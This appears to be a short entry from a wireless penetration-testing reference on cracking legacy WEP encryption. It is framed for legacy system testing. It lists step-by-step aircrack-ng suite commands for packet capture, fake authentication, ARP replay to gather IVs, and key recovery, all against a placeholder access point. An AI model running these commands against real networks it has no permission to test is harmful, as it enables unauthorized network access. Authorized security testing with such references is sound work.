WEP Cracking (Legacy)
Exploitation
Deprecated
WEP is obsolete and rarely seen. Included for completeness and legacy system testing.
WEP is completely broken and can be cracked in minutes.
Step 1: Start capture.
bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0monStep 2: Generate traffic with fake authentication.
bash
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF wlan0monStep 3: Perform ARP replay attack to generate IVs. Wait for ~20,000+ IVs.
bash
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0monStep 4: Crack the WEP key.
bash
aircrack-ng wep_capture-01.cap